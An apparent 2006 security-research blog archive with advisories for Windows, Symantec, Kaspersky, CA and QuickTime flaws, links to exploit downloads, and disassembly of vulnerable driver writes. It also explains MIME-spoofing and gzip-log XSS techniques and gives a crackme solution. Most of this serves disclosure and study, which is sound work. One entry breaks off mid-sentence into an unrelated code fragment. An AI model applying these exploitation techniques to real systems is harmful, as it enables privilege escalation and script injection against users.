Updated. The new year is coming... I have been taking a look at the NtRaiseHardError bug and, just for fun, I've coded an exploit. Watch out: not for the double-free vulnerability (indeed I have not analyzed that piece of code yet), but just relying on NtRaiseHardError internals and on how a MessageBox with the MB_SERVICE_NOTIFICATION parameter enabled is dispatched... And the Oscar goes to... "Unprivileged users" for "we can crash the machine or even read the entire csrss.exe process memory". Why? Because csrss.exe is not validating the user's parameters, and then we can use a MessageBox as a container for its own memory. Congratulations! Hey! Don't forget to buy, buy, buy, and buy these days. The world will be better.

Exploit (For educational purposes only - No modifications allowed)
Download Exploit (in C)

For those researchers who are interested in the Csrss double-free vulnerability, I have coded an arbitrary DWORD overwrite exploit. This flaw is hard to exploit (at least for me) due to the "fail-and-die" situation: corrupting the heap in a process like Csrss is dangerous. However, by definition a double-free is exploitable, and I was curious about this flaw. So, "suddenly" the memory disclosure flaw I demonstrated a few days ago has become very useful for the exploiting process. In order to exploit this flaw successfully, we need... luck :). Well, among other things. Firstly, we should seed the heap with a "magic value"; then, corrupting the heap with a specially crafted MessageBox, we are going to overwrite various controlled addresses. Some of those addresses may be overwritten with the address of a Csrss heap chunk. Thus, using the memory disclosure exploit we can spot that chunk address, which brings us the key for locating our shellcode and/or specially crafted data in memory.

This exploit is not...
+ A privilege escalation exploit. It does not contain any type of shellcode.
+ A stable exploit. The heap around Csrss.exe is barely controllable, so likely the exploit is not going to work well every time you run it. Patience. The chances of success grow if you plan to run the exploit on a machine which has been running for several minutes or hours, since the system is going to be more stable then (VMware snapshots fit perfectly).

This exploit is...
+ Code that overwrites various controlled DWORDs in the winsrv.dll data section within the Csrss.exe process.

If you are planning to exploit this issue for learning, you can code two different programs extracting routines from this exploit: the "corrupter" and the "csrss memory monitor". In this case, manual analysis is better. If you are reading this text and know how to exploit this issue in a better way, please contact me; I would be pleased to talk (and learn) about your method. Anyway, since the situation is quite volatile, the exploit is just intended for demonstrating the theory. Tested on XP SP2. Change the winsrv.dll data section address (MAGIC_VALUE) if you want to add support for other versions.

Download Exploit (in C)
Download video "Csrss.exe Double-Free - Arbitrary DWORD overwrite"
Music: "William Tell Overture (Abridged)". Album: Soundtrack - A Clockwork Orange.
To be continued...
(Thursday, 16 November 2006) Written by Rubén
Updated: CA has addressed this issue.

Hi. Today, I am going to bypass my own disclosure policy. The reason is that I've notified the vendor, in this case Computer Associates, but got no response. I was thinking that the issue was not important for them, when suddenly I heard a voice in my head saying: "share the knowledge or die like a dog!"... I had no choice. Btw, CA sirs: people usually reply, at least, with "thanks for your email", a.k.a. "good manners". This issue is somewhat similar to the Kaspersky flaw. Summing up: unprivileged users executing arbitrary code with kernel privileges. I am wondering if driver signing, one of the new improvements of Vista, includes a security audit in the cost... If not, rootkits will be with us forever and ever, taking into account the current amount of flaws present in security products.

Download Advisory "CA HIPS Drivers - Multiple Privilege Escalation Vulnerabilities"
Exploits (For educational purposes only - No modifications allowed)
Download Exploit #1 (Kmxfw.sys Driver)
Download Exploit #2 (Kmxstart.sys Driver)

+ Movie of the Month: 12 Angry Men. Year: 1957. Directed by: Sidney Lumet
+ Song of the Month: "Jo Ta Ke". Band: Su Ta Gar. Album: "Jo Ta Ke"
+ Canvas of the Month: Bouquet de soleils. Artist: Claude Monet
+ Animation of the Month: Kiwi. Artist: Dony
News
(Thursday, 19 October 2006) Written by Rubén
Updated: Kaspersky has released its own advisory: http://www.kaspersky.com/technews?id=203038678

Hi all! I've got a lot of news for posting, but "step by step" will be better. Firstly, Kaspersky has just addressed a privilege escalation vulnerability which I discovered a few weeks ago. I am unable to locate an advisory from Kaspersky, so I am wondering whether they are going to release something on this issue or not. Summing up the vulnerability: unprivileged users can execute code with kernel privileges.

Download Advisory "Kaspersky NDIS-TDI Hooking Engine Drivers Privilege Escalation"
Exploits (For educational purposes only)
Download exploit #1 (KLICK Driver)
Download Exploit #2 (KLIN Driver)
References: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=425

Reversemode News

I am updating contents, fixing minor errors within the papers, changing their appearance and so on. For example, an improved version of the paper titled "Generic Detection And Classification of Polymorphic Malware Using Neural Pattern Recognition" is available. From now on, each document will be released using a template according to its contents. Before 2007 the entire collection of documents should be migrated to the "new look" as well as revised and improved. I want a quality R&D section, so I am putting effort into researching innovative stuff. We'll see the results. I think that R&D was the past, is the present and will be the future. We cannot keep repeating the same errors forever and ever. We should start to do the right thing, shouldn't we? Finally, the corporate website is up, although still "under construction". Upcoming projects and news needed it. Check it out at http://corporate.reversemode.com

Greets, Rubén.
Hunting for Symantec
(Thursday, 05 October 2006) Written by Rubén
Hi! During this year I have published advisories for well-known vendors like Microsoft, Apple, Intel... Before 2006 ends some of them will repeat, and new ones will join the party. Today is the day for Symantec. The entire family of Symantec and Norton products for Microsoft platforms is prone to a local privilege escalation vulnerability. Two device drivers are affected: NAVEX15.sys and NAVENG.sys.

NAVEX15.sys

#LOW VALUES
PAGE:0004B611 sub edx, 222AD3h
PAGE:0004B617 push esi
PAGE:0004B618 jz short loc_4B63C
loc_4B63C: mov edx, [ecx+3Ch]
PAGE:0004B63F test edx, edx
PAGE:0004B641 jz short loc_4B653
PAGE:0004B643 push 4
PAGE:0004B645 pop esi
PAGE:0004B646 cmp [eax+4], esi
PAGE:0004B649 jnz short loc_4B653
PAGE:0004B64B mov dword ptr [edx], 200h // No check: EDX = controlled.

#HIGH VALUES
PAGE:0004B61A push 4
PAGE:0004B61C pop esi
PAGE:0004B61D sub edx, esi
PAGE:0004B61F jnz short loc_4B653
PAGE:0004B621 mov edx, [ecx+3Ch]
PAGE:0004B624 test edx, edx
PAGE:0004B626 jz short loc_4B653
PAGE:0004B628 cmp [eax+4], esi
PAGE:0004B62B jnz short loc_4B653
PAGE:0004B62D mov dword ptr [edx], offset sub_4B71B // No check: EDX = controlled.

So, after thinking for a while, I have decided to release public exploit code for these flaws, in order to show that every kernel memory overwrite can be exploited, even if we are not controlling the values. How?

+ Non-controlled: High values
Overwriting MmUserProbeAddress, so we can modify the range accepted by ProbeForWrite; thus a bunch of IOCTLs from different drivers will become very useful. The following exploits implement this method. You will need admin privileges, since the Shadow Device (mrxsmb.sys) is used to generate values. For educational purposes ONLY.
Download exploit #1
Download exploit #2
Download exploit #3
Download exploit #4

+ Non-controlled: Low values
Overwriting the NtQuerySystemInformation switch table:
ff248500cb5780 jmp dword ptr [nt!NtQuerySystemInformation+0xe08 (8057cb00)+eax*4]
The following exploits implement this method. No special privileges are needed. For educational purposes ONLY.
Download exploit #1
Download exploit #2

The exploits have been successfully tested on XP SP2 and 2K SP4 fully patched.

Download Advisory "Symantec Antivirus Engine Privilege Escalation"
References:
http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05a.html
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=417
Insecure Browsers
(Wednesday, 27 September 2006) Written by Rubén
I would like to comment on some insecure actions performed by widely used browsers like IE, Firefox and Opera. These flaws, or insecure features, could lead to XSS, phishing or other "identity theft" attacks.

::Issue #1:: GZ files - insecure handling
Affected: Firefox & Opera

Both browsers render .gz files automatically using the Content-Type sent by the server. On the other hand, IE prompts the "Download" dialog to the user, which is right. This insecure file handling can lead to an XSS attack; indeed I have conducted a real-life attack (legally, of course) against a known hosting company, which had the perfect environment for the attack. How does this attack work? The scenario would be as follows:

Server-side: Insecure "AddType" settings for gz files, i.e. text/html.
Client-side: A victim clicking directly on a link to a gz file instead of using "Save as". Actually, a high percentage of users will click directly.

Attacking:
+ An internal control panel or corporate application which allows the user to download its server logs compiled as a ".gz" file.
+ The link that the user follows points directly to the ".gz" file.
+ The Content-Type sent by the server is "text/html".

If the user clicks the link using Firefox or Opera, the .gz file will be rendered as "html", since the browser trusts the Content-Type sent by the server. Thus, if we have been poisoning the log with XSS attack traces ("brute-forcing" arbitrary URLs with XSS scripts), the final result is those malicious scripts executing within the context of the Admin/User. Since the attack relies on a previously insecure scenario, it is not so easy to perform; however, it has had success in a real-life situation.

::Issue #2:: MIME Spoofing
Affected: Firefox & Opera & IE

If a proper Content-Type is sent from the server side, those browsers do not perform any MIME sniffing, rendering the file as the server rules. This situation could lead to an XSS, phishing or exploit-based attack. How? Let's see an example. Modifying .htaccess in order to alter the Content-Type of a well-known extension, e.g. JPG files:

AddType text/html .jpg

Using a specially crafted image which hides a malicious script/html within its comment chunk, we could fool the user. Even if the victim uses the "Save as" option instead of opening the image file directly (http://...../exploit.jpg), he/she will see a valid image file. A lot of users would click a link with a .jpg extension, whereas perhaps .html seems more dangerous. It is known that those browsers implement MIME sniffing, but clearly not correctly. The browser should display a warning about the mismatch, at least if well-known extensions (jpg, gif, png...) are involved. Please note that while browsing, extensions != file formats; we agree on that. We could configure a .jpg extension to execute itself as a php script, but we are not talking about that situation; we are focusing on a valid file with a valid extension but using a spoofed Content-Type. The following proof of concept is provided: http://mimespoofing.reversemode.com/exploit.jpg The PoC does not contain any malicious code, just an alert().
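A server-side guard for both issues, as an added example (my code, not part of the original post or its PoC): before a download handler decides on a Content-Type, check that the declared type matches the file's magic bytes and that a JPEG's COM segment carries no markup. The function names and the sample byte strings are constructed here.

```c
/* Added example, not code from the post or its PoC: server-side checks a
 * download handler can run before it decides on a Content-Type. Function
 * names and the sample byte strings below are constructed for this page. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* 1 when the declared Content-Type agrees with the body's leading bytes,
 * 0 on a mismatch (a gzip stream or JPEG declared as text/html), -1 when
 * the body starts with no signature this checker knows. */
int content_type_matches(const uint8_t *body, size_t len, const char *ctype) {
    static const struct { const char *type; const char *magic; size_t n; } sig[] = {
        { "application/gzip",   "\x1f\x8b",     2 },
        { "application/x-gzip", "\x1f\x8b",     2 },
        { "image/jpeg",         "\xff\xd8\xff", 3 },
        { "image/png",          "\x89PNG",      4 },
        { "image/gif",          "GIF8",         4 },
    };
    int known = 0;
    for (size_t i = 0; i < sizeof sig / sizeof sig[0]; i++) {
        if (len >= sig[i].n && memcmp(body, sig[i].magic, sig[i].n) == 0) {
            known = 1;
            if (strcmp(ctype, sig[i].type) == 0)
                return 1;
        }
    }
    return known ? 0 : -1;
}

/* Walks the JPEG marker segments up to SOS/EOI and reports whether any COM
 * (FF FE) segment carries a '<', the place where the post hides its markup.
 * A malformed segment length is reported as 1 ("do not serve") as well. */
int jpeg_comment_has_markup(const uint8_t *body, size_t len) {
    if (len < 4 || body[0] != 0xFF || body[1] != 0xD8)
        return 0;                                   /* not a JPEG at all */
    size_t pos = 2;                                 /* first marker after SOI */
    while (pos + 4 <= len && body[pos] == 0xFF) {
        uint8_t marker = body[pos + 1];
        if (marker == 0xD9 || marker == 0xDA)       /* EOI or SOS: scan ends */
            break;
        size_t seglen = ((size_t)body[pos + 2] << 8) | body[pos + 3];  /* counts itself */
        if (seglen < 2 || pos + 2 + seglen > len)
            return 1;                               /* truncated or bogus length */
        if (marker == 0xFE && memchr(body + pos + 4, '<', seglen - 2) != NULL)
            return 1;
        pos += 2 + seglen;
    }
    return 0;
}

/* Policy a download endpoint could apply: serve only when the declared type
 * matches the magic bytes and, for JPEGs, the comment segment is clean. */
int safe_to_serve(const uint8_t *body, size_t len, const char *ctype) {
    if (content_type_matches(body, len, ctype) != 1)
        return 0;
    if (strcmp(ctype, "image/jpeg") == 0 && jpeg_comment_has_markup(body, len))
        return 0;
    return 1;
}

/* Constructed samples: a gzip header, a JPEG whose COM segment holds a script
 * tag (the MIME spoofing trick), and a JPEG with a harmless comment. */
const uint8_t sample_gz[] = { 0x1F, 0x8B, 0x08, 0x00 };
const uint8_t sample_jpg_script[] = {
    0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x1B,
    '<','s','c','r','i','p','t','>','a','l','e','r','t','(','1',')',
    '<','/','s','c','r','i','p','t','>', 0xFF, 0xD9 };
const uint8_t sample_jpg_clean[] = {
    0xFF, 0xD8, 0xFF, 0xFE, 0x00, 0x05, 'a','b','c', 0xFF, 0xD9 };
```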
Waiter, there's a bug in my apple!
(Tuesday, 12 September 2006) Written by Rubén
Hi! Today's dinner is a QuickTime FLIC File Heap Overflow advisory. QuickTime is really horrible on security. Actually, it is a fact, not a point of view. I have lost count of the exploitable vulnerabilities discovered this year. A security update for QuickTime fixed more than twenty flaws, so I thought "hey, I want my piece of cake too!" and here is the result. Mike Price of McAfee AVERT Labs also spotted this flaw. The flaw is remotely exploitable if the attacker tricks the victim into visiting a malicious webpage with the exploit embedded. I have released a PoC for testing and educational purposes only. This PoC is not an exploit; do not email me requesting an exploit. If you are planning to use this PoC in order to build an exploit-spyware-financial-crap-downloader, I hope you die.

Downloads:
Download Advisory "Apple Quicktime FLIC/CEL File Heap Overflow"
Download PoC
References:
http://docs.info.apple.com/article.html?artnum=304357
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=413

Talking about other issues, in December the European magazine for developers using Microsoft platforms, "MsCoder", will publish an article of mine. The article will focus on the Windows kernel and drivers. Finally, Reversemode's first anniversary is coming (November)! There will be a lot of surprises ;) stay tuned!

Greets, Rubén.
F-Secure Reverse Engineering Challenge
(Monday, 07 August 2006) Written by Rubén
Update. Thanks to Era for the translation:
salasana - password (literally "secret word")
sanakirja - dictionary (lit. "word book")
resurssien uudelleenallokointi - resource reallocation
toimintaprosessi - process of execution
laajakaista - broadband
hilavitkutin - gizmo
tutkimus ja tuotekehitys - research and development
vempele - thingy
ryokale - rascal (roughly) (properly "ryökäle")
paukapaa - idiot (roughly) (properly "paukapää")
kaistapaa - crackpot (properly "kaistapää"; lit. "lane head")
lurrjus - rascal (properly "lurjus")
hunsvotti - scoundrel (roughly)

Last Friday the F-Secure Reverse Engineering Khallenge started. In the end, just 16 people succeeded in solving it. I was number six. I really enjoyed reversing the three files; however, the last one was the funniest executable that I have ever reversed. It was a numerical maze. For those who tried the challenge but unfortunately did not solve it, here is my brief analysis.

LEVEL 1
Obviously the password is obvious :)

push 0 ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push 0 ; cchMultiByte
push 0 ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push offset WideCharStr ; "The password is obvious"
push 0 ; dwFlags
push 0 ; CodePage
call esi ; WideCharToMultiByte

It is a very usual trick in HackIts, challenges...

LEVEL 2
Chained words.

.data:00407034 ; "salasana"
.data:00407038 dd offset aSanakirja ; "sanakirja"
.data:0040703C dd offset aResurssienUude ; "resurssien uudelleenallokointi"
.data:00407040 dd offset aToimintaproses ; "toimintaprosessi"
.data:00407044 dd offset aLaajakaista ; "laajakaista"
.data:00407048 dd offset aHilavitkutin ; "hilavitkutin"
.data:0040704C dd offset aTutkimusJaTuot ; "tutkimus ja tuotekehitys"
.data:00407050 dd offset aVempele ; "vempele"
.data:00407054 dd offset aRyokale ; "ryokale"
.data:00407058 dd offset aPaukapaa ; "paukapaa"
.data:0040705C dd offset aKaistapaa ; "kaistapaa"
.data:00407060 dd offset aLurrjus ; "lurrjus"
.data:00407064 dd offset aHunsvotti ; "hunsvotti"

We had to make up a word from one present in the above table; in addition, going forward 5 characters within that word, another valid word had to be present. Just like a children's game.
Solution: "laajakaistapaa" (laajakaista + kaistapaa)
Btw, what is the meaning of these words? I guess that is Suomi.

LEVEL 3
The fun starts. The password is the path you have to follow in order to reach the goal. As in every maze, UP, DOWN, LEFT or RIGHT are valid movements. In this case:
UP is defined by 2 (0x32) + 0x1D
DOWN is defined by 8 (0x38) - 0x1D
LEFT is defined by 4 (0x34) - 1
RIGHT is defined by 6 (0x36) + 1

Well, I have coded a tiny game titled "Assemblyrinth". This game is based on this level. If you have a look at the source code, you will find the solution, an algorithm which propagates the maze and a few surprises :)
Download Assemblyrinth (in C)
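The Level 2 rule as a search over the table above, as an added example (my solver, not the challenge's code): CHAIN_STEP and the function name are my own names, and the spellings are the ones in the .data listing.

```c
/* Added solver for the Level 2 rule described above (my code, not F-Secure's):
 * take a table word, move forward CHAIN_STEP characters inside it, and require
 * that a second table word begins right there and continues past the first
 * word's end. The chained word is the first CHAIN_STEP characters of the first
 * word followed by the whole second word. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define CHAIN_STEP 5

/* The strings exactly as they appear in the .data listing. */
static const char *table[] = {
    "salasana", "sanakirja", "resurssien uudelleenallokointi", "toimintaprosessi",
    "laajakaista", "hilavitkutin", "tutkimus ja tuotekehitys", "vempele",
    "ryokale", "paukapaa", "kaistapaa", "lurrjus", "hunsvotti",
};
#define TABLE_LEN (sizeof table / sizeof table[0])

/* Returns the number of chains found; out (outsz bytes) receives the last
 * chain found, or "" when there is none. */
int find_chain(char *out, size_t outsz) {
    int found = 0;
    out[0] = '\0';
    for (size_t i = 0; i < TABLE_LEN; i++) {
        const char *a = table[i];
        if (strlen(a) <= CHAIN_STEP)
            continue;                               /* nothing left after the step */
        const char *tail = a + CHAIN_STEP;          /* where the second word must start */
        size_t taillen = strlen(tail);
        for (size_t j = 0; j < TABLE_LEN; j++) {
            const char *b = table[j];
            if (j == i || strlen(b) <= taillen || strncmp(b, tail, taillen) != 0)
                continue;                           /* b must begin with tail and go past it */
            if (CHAIN_STEP + strlen(b) + 1 > outsz)
                continue;                           /* would not fit the caller's buffer */
            memcpy(out, a, CHAIN_STEP);
            strcpy(out + CHAIN_STEP, b);
            found++;
        }
    }
    return found;
}

int main(void) {
    char chain[64];
    int n = find_chain(chain, sizeof chain);
    printf("%d chain(s); password: %s\n", n, chain);   /* 1 chain(s); password: laajakaistapaa */
    return 0;
}
```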
Intel PROset/Wireless security update
(Saturday, 29 July 2006) Written by Rubén
Intel has addressed the Intel PROset/Wireless security issue which I posted to bugtraq a few months ago. According to Intel: "Applications written to the Intel® PRO/Wireless Network Connection Software API which utilize the API to apply WLAN profiles are also affected by this vulnerability. Intel recommends customers contact their OEM for an updated version of the OEM's WLAN application." Intel's Advisory: "Intel® PROSet/Wireless Software Local Information Disclosure"
Optoelectronic for Fun and Profit
(Monday, 17 July 2006) Written by Rubén
"Sometimes, when the night is dark and cold, I hear a voice in my head saying: Phototransistors will rule the world, be careful. Kill 'em all. Mmmmmm coookieeesss!" George W. Bush.

Before the last phototransistor is destroyed by Bush, I will try to explain how I made a home-made remote control for my laptop using only recycled materials. Here we go!

Wikipedia: A phototransistor is in essence nothing more than a bipolar transistor that is encased in a transparent case so that light can reach the base-collector junction. The phototransistor works like a photodiode, but with a much higher sensitivity for light, because the electrons that are generated by photons in the base-collector junction are injected into the base, and this current is then amplified by the transistor operation. A phototransistor has a slower response time than a photodiode, however.

Summing up, a phototransistor/photodiode takes light and returns pulses. Cool!

- Where can I find one of those? Inside a mouse, an old VHS player... Any machine that supports a remote control is likely to include a photodetector.

Hands on! This is my old AIWA VHS player. I still remember when my parents bought it. I could not believe it! I had a VHS player! But years later the DVD came into play and the VHS was abandoned. Actually, VHS was not a good video format, but marketing and markets brought it to the top. So, my life is not going to change whether I extract the phototransistor from the video player or not, so I did. You should find the display, and likely the phototransistor will be close to it. Maybe, as in this case, "caged" inside a metal box. This is our small "treasure". Maybe you are wondering why this phototransistor has only Collector and Emitter and does not have a Base; however, that is not exactly true. The Base is encapsulated; in fact it is the radiation captured by the photodiode, which is part of the phototransistor.

- Well, but how can I connect this phototransistor to my laptop? - Pretty simple, using the microphone input. The pulses emitted by the phototransistor will be captured by the sound card, so then we have the "connection mechanism". You can use a microphone or headphones; I used the latter. Just join the wires to the Collector and the Emitter as follows. You should use a wrapper; in this case, it is just an old display without the liquid crystal.

Testing it. Well, the problem that we want to solve is, for instance, to turn off the computer automatically. Our phototransistor is sensitive to light changes and infrared light, so, being in bed about to fall into the arms of Morpheus (the god of dreams, not Laurence Fishburne), we could choose to activate the shutdown mechanism by turning off the light or using the remote control. The following video shows the output of "/dev/dsp" (the default sound I/O device in Linux) in real time when I turn the light on/off (waveform ASCII characters versus a static pattern) and when the original remote control is used (static pattern versus strange characters appearing suddenly). Seeing the output, a simple shell script solves the issue. Obviously, more advanced output handling could be done, implementing a highly customizable home-made remote control system.

Download Video. Music: "Woo Hoo", The 5.6.7.8's - Kill Bill Volume 1 Soundtrack. Duration: 2 min.
Try it yourself!
Gabriel's www.advansen.com. Paper "Useful Polymorphism in C"
(Friday, 07 July 2006) Written by Rubén
Gabriel, who runs www.advansen.com, has released a paper titled "Useful Polymorphism in C". Watch out! He is talking about OO polymorphism. Very interesting paper. Download Link. Congratulations Gabri!
Fresh Bugs
(Tuesday, 13 June 2006) Written by Rubén
Update 15.06.2006

Copy & paste from an email that I have posted to bugtraq:

Hi, just to confirm that Microsoft has not fixed the NtClose/ZwClose deadlock vulnerability. The bulletin MS06-030 addressed this flaw as "SMB Invalid Handle Value", which is just a euphemism from my point of view. The code added to mrxsmb.sys is just a wrapper in order to avoid the "Invalid Handle". I am sure that Microsoft has its own reasons to do this; I do not care about them. I'm not interested in discussing. However, I think that the driver developer community should be informed that by using NtClose/ZwClose, the driver will be exposed to a security issue by default. If this issue is considered a feature, please, document it. A developer is not strictly required to know this behaviour.

------
case IOCTL_CLOSEHANDLE_DEADLOCK:
    inBuf = Irp->AssociatedIrp.SystemBuffer;   /* the request buffer supplied by the caller */
    ZwClose((HANDLE)inBuf[0]);                 /* handle value taken straight from that buffer */
------

Microsoft has updated the Acknowledgments section in the security bulletin MS06-030; it had not credited me due to a misunderstanding. Brian Krebs wrote a little comment about this issue on his Washington Post blog. Thanks to all who have e-mailed me regarding the published papers.

14.06.2006

The paper "Generic Detection And Classification Of Polymorphic Malware Using Neural Pattern Recognition" is currently available. For some hours a wrong version was uploaded, but now it is the right version. However, it is just an initial release which will be completed and improved. The experimental results obtained are based on the Morphine polymorphic packer/cypher.

Abstract: The obsolete way in which some anti-virus products generate malware signatures is causing polymorphic malware detection to become a tedious problem, when actually it is not so hard. This paper describes the basics of a method by which the generic classification of polymorphic malware could be considered a trivial issue.

I'm back with fresh news. Microsoft has just released the Security Bulletin for June, which addresses two vulnerabilities that I found last year. Thanks to Microsoft for not crediting me in the bulletin; just iDefense has been credited. Irony mode off. The root of both vulnerabilities is the Microsoft Server Message Block Redirector Driver (mrxsmb.sys). One of them could allow any user to execute Ring0 code. The second one is not only a problem of the driver, as Microsoft says in the bulletin; the flaw is inside the Kernel Object Manager. The flaw is a deadlock that could allow any process to become unkillable. The issue is that this deadlock is triggered through mrxsmb.sys. I have not tested the fix, but it would be so nasty to have fixed just the driver, "avoiding" the kernel...

Download Paper - "Reversing Mrxsmb.sys. Chapter I: Getting Ring0"
Download exploit
Download Paper - "Reversing Mrxsmb.sys. Chapter II: NtClose DeadLock"
Download exploit

Kartoffel is now released. You can test these vulnerabilities using it. The user's guide is included in the zip file. Source code and executable versions are also included.
Download Kartoffel v1.0
Kartoffel in action, detecting the privilege escalation previously explained.
Microsoft Infotech Storage Library Heap Corruption
(Tuesday, 09 May 2006) Written by Rubén
Microsoft Infotech Storage System Library is prone to a heap corruption vulnerability. This issue is due to the failure of the library to properly check a specially crafted CHM file. Successful exploitation of this flaw would allow arbitrary code execution. Itss.dll is the system library which deals with the CHM/ITS format. Microsoft rates the CHM file format as potentially dangerous, similar to an executable file. Nevertheless, this flaw is triggered just by decompiling the malicious CHM file (using hh -decompile), thus malicious attackers could trick users into performing this operation, or even advanced users or researchers could attempt to decompile it before opening it. Microsoft plans to address this issue in the next Service Pack. Due to this fact, users of certain Windows versions should implement their own protection mechanism.

Download Advisory
Download Proof Of Concept
Where is my WEP?
(Tuesday, 02 May 2006) Written by Rubén
Update: Intel's Advisory: "Intel® PROSet/Wireless Software Local Information Disclosure"

Testing a vuln-finder application that I am developing, I found a flaw within S24EvMon.exe. It is a service which is part (at least) of the Intel PROset/Wireless software. This application is provided by Intel in order to support Intel wireless devices based on Spectrum 24 chipsets. This service uses a shared memory section which is created without the proper security descriptor, allowing unprivileged users to perform operations like Delete, Read or Write on the memory. The section is named "S24EventManagerSharedMemory". This shared memory is used to store, in plain text, confidential information like the WEP key, passwords... Successful exploitation of this vulnerability could allow any unprivileged user to access confidential information, exposing the network. An important mitigating factor is that the vulnerability is local; nevertheless, some malware could take advantage of this flaw.

Download Exploit (C source code)
Sehuk, my strange length disassembler engine.
(Tuesday, 07 February 2006) Written by Rubén
Update 19/04/2006 - Upcoming article. In July, the IT security magazine "Hakin9" (www.hakin9.org) will publish an article of mine. Summing up, it comprises: hooking methods; implementation of the Sehuk LDE and Congrio; malware analysis using these tools.

11/02/2006 - New Release. v.02 [-] Added initial Call and Jcc/Jmp emulation.

Here is Sehuk, my 0xF2-byte (and growing) length disassembler engine. It is mainly oriented toward Detour hooking, or just hooking. I have coded a renewed version of a tiny old program in order to release the Sehuk Engine VC++ asm-inline version. This app, named "Congrio", could be considered a "universal" hooker (with a lot of imagination). The goal of Congrio is to provide a fast method to deal with packed malware. For instance, if we hook ExitProcess, the classification of certain packed malware becomes trivial (as the video example shows), even if it is packed with an unknown packer. Another possible scenario could be when packed malware uses process injection or remains just a few tenths of a second in memory; Congrio is very useful in this case. It diverts the execution flow, thus the hooked process is "politely" invited to sleep during a defined interval. VC++ asm-inline and nasm (http://www.kernel.org/pub/software/devel/nasm/) versions are currently available.

Download Video showing the basics of Congrio. The target is one of the real malware samples (packed with SVKP 1.3x) selected for the CSRRT-LU malware contest. Music by Clint Mansell - Requiem for a Dream (orchestral version). Duration 12:24. In Castilian Spanish.
Download Congrio (includes Sehuk v.02 - VC++ asm inline). Also available from "Downloads" -> "Sehuk & Congrio"
Download Sehuk Engine v.02 (proof of concept, asm version - nasm). Also available from "Downloads" -> "Sehuk & Congrio"
Mozilla/Firefox & Adobe, "embedded" problems
(Thursday, 02 February 2006) Written by Rubén
There is a "mutual incompatibility" between the Adobe PDF reader plugin and Mozilla/Firefox browsers. Embedding two or more pdf documents using
    if (mPluginType == nsPluginType_Real) {
      if (sInMessageDispatch && (msg == sLastMsg)) {
    #ifdef DEBUG
        printf("Dropping event %d for Real on the floor\n", msg);
    #endif
        return PR_TRUE; // prevents event dispatch
      } else {
        sLastMsg = msg; // no need to prevent dispatch
      }
    }
The bug has been reported. You can test it here: http://www.reversemode.com/pdfbug/poc.html
Winamp 0Day exploit
(Monday, 30 January 2006) Written by Rubén
It seems that somebody has released a 0Day exploit for the widely used multimedia player, WinAmp. I found the vulnerability more or less one month ago, as the iDefense advisory shows.
Update: The Winamp team don't care about the security of their customers. Common sense tells me: "Watch out! Do not disclose this vulnerability before a patch; otherwise it will allow the adware-spyware-spam-scam mafia to make even more money." They are already earning a lot of money just deceiving people. It is also known as savage capitalism. There are circumstances where a 0Day exploit has meaning, but at the present day, if somebody releases a 0Day exploit for software like Winamp, it will only benefit all that scum. What happened with WMF? I guess that some researchers should reflect at great length before disclosing any unpatched vulnerability. Perhaps you will not get your 5 minutes of "fame", but we should act beyond our ego.
Please do not "hlp" me!
(Sunday, 22 January 2006) Written by Rubén
How in the world could the Microsoft engineers feel like developing dangerous file formats? I mean code and data mixed; I do not know, but they did it. The most widespread "vulnerability" ever known, the WMF issue, was directly caused by one of these "funny" file formats. But WMF is not alone... The WinHelp file format, aka .hlp, is another example of an old and extremely dangerous mixed format. The WinHelp format was born with Windows 3.1 and is still supported at the present day by Windows 2000, Windows XP... In addition, it is actively used by Microsoft and third-party software to deliver help documentation. The WinHelp file format is the most similar to an executable file without being one. Several viruses even infect this format thanks to its powerful scripting language. One of the documented macros supported by this format is "RegisterRoutine". Using this macro we can register any function of any DLL:
    [CONFIG]
    RegisterRoutine("Kernel32.dll", "Beep", "UU")
Then the function can be used like any other macro defined within the WinHelp project:
    {\uldb Do Beep}{\v !Beep(750, 5000)}
Microsoft released a security update addressing the issue. Before it, .hlp files could be loaded by Internet Explorer using hhctrl.ocx (winhelp command), so any code could have been executed. Now it is different: remote execution is not possible, although macro support is still active locally. There are few fully trusted formats, and hlp is not one of them, so I think it should not be used to deliver documentation. HLP STOP!
NetStasi
(Saturday, 07 January 2006) Written by Rubén
Yesterday, surfing the MSDN, I discovered the embedded Visual C++ and the SmartPhone and Pocket PC SDKs. Each SDK includes a nice emulator, and multilingual images are also available, so you can immediately begin to develop software. I have neither a Pocket PC device nor a Smartphone, so it is very useful for me :) In order to learn more about Pocket PC, I have coded a very, very simple network scanner, NetStasi. Its only feature is to ping machines within a desired IP range; when a machine is up, NetStasi will try to connect to port 23 and display the data received. Just for fun.
Download NetStasi EVC++ Project (GPL) from "Files" -> "Pocket PC".
Download Embedded Visual C++